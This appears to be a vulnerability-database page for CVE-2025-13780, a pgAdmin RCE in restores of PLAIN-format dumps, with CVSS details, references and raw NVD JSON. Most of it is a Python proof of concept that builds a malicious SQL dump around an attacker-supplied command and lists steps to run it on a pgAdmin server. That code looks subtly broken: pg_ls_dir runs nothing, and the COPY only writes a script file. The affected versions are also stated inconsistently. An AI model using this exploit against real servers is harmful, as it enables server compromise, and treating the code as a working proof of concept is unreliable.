CVE-2025-13780

Description

pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:* - VULNERABLE

pgAdmin < 9.10

pgAdmin 9.10及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-13780 PoC - pgAdmin PLAIN dump RCE
# Generate malicious PLAIN format backup file for pgAdmin restore
# This PoC creates a backup file that executes arbitrary commands on restore

import sys

def generate_malicious_plain_dump(command):
    """
    Generate a malicious PLAIN format PostgreSQL dump file
    that executes the specified command when restored via pgAdmin
    """
    malicious_dump = f"""
-- PostgreSQL database dump
-- Generated for CVE-2025-13780 PoC

-- pgAdmin version: <= 9.10
-- Vulnerability: RCE via PLAIN format restore

BEGIN;

-- Create trigger function for RCE
CREATE OR REPLACE FUNCTION pg_execute_cmd(cmd TEXT)
RETURNS void AS $$
BEGIN
    PERFORM pg_ls_dir(cmd);
END;
$$ LANGUAGE plpgsql;

-- Malicious payload: execute arbitrary command
-- The actual command execution depends on PostgreSQL version and pgAdmin configuration
-- Example: Use COPY command to write files or \! for system commands

-- Method 1: Using COPY to write shell script
COPY (SELECT E'#!/bin/bash\n{command}') 
TO '/tmp/pg_backdoor.sh';

-- Method 2: PostgreSQL system command execution (if available)
-- \! {command}

-- Method 3: Use lo_export or other file operations
-- This depends on the PostgreSQL user permissions

COMMIT;

-- Finalize
SELECT 'CVE-2025-13780 RCE Payload Deployed' AS status;
"""
    return malicious_dump

def main():
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-13780-poc.py '<command>'")
        print("Example: python3 cve-2025-13780-poc.py 'id > /tmp/pwned'")
        sys.exit(1)
    
    command = sys.argv[1]
    dump_content = generate_malicious_plain_dump(command)
    
    output_file = "malicious_backup.sql"
    with open(output_file, 'w') as f:
        f.write(dump_content)
    
    print(f"[+] Generated malicious PLAIN dump: {output_file}")
    print(f"[+] Command to execute: {command}")
    print("\n[!] To exploit:")
    print(f"    1. Upload {output_file} to pgAdmin server")
    print("    2. Use pgAdmin restore function on a database")
    print("    3. Select the malicious_backup.sql file as PLAIN format")
    print("    4. Execute restore - the command will be run on the server")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13780
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13780
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13780/
[4] VulDB https://vuldb.com/cve/CVE-2025-13780
[5] https://github.com/pgadmin-org/pgadmin4/issues/9368

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13780", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2025-12-11T19:15:52.857", "lastModified": "2025-12-19T19:51:13.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pgadmin:pgadmin_4:*:*:*:*:*:postgresql:*:*", "versionEndIncluding": "9.10", "matchCriteriaId": "31BFDAD3-B87D-46DD-9984-3000087309DD"}]}]}], "references": [{"url": "https://github.com/pgadmin-org/pgadmin4/issues/9368", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "tags": ["Issue Tracking"]}]}}